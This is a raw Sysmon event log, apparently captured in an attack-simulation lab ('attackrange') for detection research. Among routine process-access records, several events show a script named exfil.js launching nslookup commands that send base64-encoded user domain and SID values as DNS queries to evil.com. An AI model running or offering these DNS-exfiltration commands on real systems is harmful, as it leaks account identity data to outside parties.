10341000x8000000000000000216905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.773{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D646-000000005F02}6228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.757{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.757{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.757{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.757{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.757{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D546-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.757{2E1864BB-18E0-629A-6742-000000005F02}39767628C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-D546-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.766{2E1864BB-1903-629A-D546-000000005F02}7856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbewg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.757{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnbt.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.725{2E1864BB-1903-629A-D346-000000005F02}62601384C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-D446-000000005F02}7384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.710{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D446-000000005F02}7384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.710{2E1864BB-1903-629A-D246-000000005F02}54364728C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-D446-000000005F02}7384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.716{2E1864BB-1903-629A-D446-000000005F02}7384C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-D246-000000005F02}5436C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnbt.tmp 2>&1 10341000x8000000000000000216888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.672{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D346-000000005F02}6260C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.672{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D346-000000005F02}6260C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.672{2E1864BB-1903-629A-D346-000000005F02}62601384C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-D246-000000005F02}5436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.657{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D346-000000005F02}6260C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.641{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D246-000000005F02}5436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.641{2E1864BB-18E0-629A-6742-000000005F02}39767076C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-D246-000000005F02}5436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.653{2E1864BB-1903-629A-D246-000000005F02}5436C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnbt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.641{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxwq.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.588{2E1864BB-1903-629A-D046-000000005F02}60327948C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-D146-000000005F02}5628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.588{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 